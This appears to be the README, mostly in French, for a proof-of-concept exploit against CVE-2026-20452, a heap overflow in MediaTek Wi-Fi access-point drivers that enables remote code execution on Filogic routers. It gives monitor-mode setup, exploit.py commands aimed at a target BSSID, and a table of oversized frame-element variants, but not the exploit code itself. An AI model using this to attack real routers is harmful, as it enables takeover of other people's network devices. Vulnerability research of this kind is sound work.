
Exploit de preuve de concept pour CVE-2026-20452, un débordement de tampon basé sur le tas dans les pilotes WLAN AP de MediaTek. Utilise scapy pour envoyer des trames de gestion Wi-Fi spécialement conçues afin de déclencher une exécution de code à distance sur les routeurs Filogic concernés.
Exploit de type preuve de concept pour CVE-2026-20452, un débordement de tampon basé sur le tas dans le pilote de point d'accès WLAN de MediaTek.
https://www.hunt-benito.com/blog/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/
pip install scapy)sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Interface becomes wlan0mon
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
--overflow-size 1024 --variant 2 --count 50 --delay 0.05
Cet outil est fourni uniquement à des fins de recherche en sécurité et d'éducation autorisées. La transmission sur les fréquences Wi-Fi peut nécessiter une autorisation légale dans votre juridiction. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester est illégale. Les auteurs déclinent toute responsabilité et ne sont pas responsables des mauvais usages ou des dommages causés par cet outil.
| Variante | Type IE | Description |
|---|
| 0 | Vendor Specific (221) | IE surdimensionné unique avec OUI 00:50:43 |
| 1 | IE vendeurs chaînés | Plusieurs petits IE pour corrompre les objets de tas adjacents |
| 2 | HT Capabilities (45) | IE de capacités HT surdimensionné |
| 3 | Extended Capabilities (127) | IE de capacités étendues surdimensionné |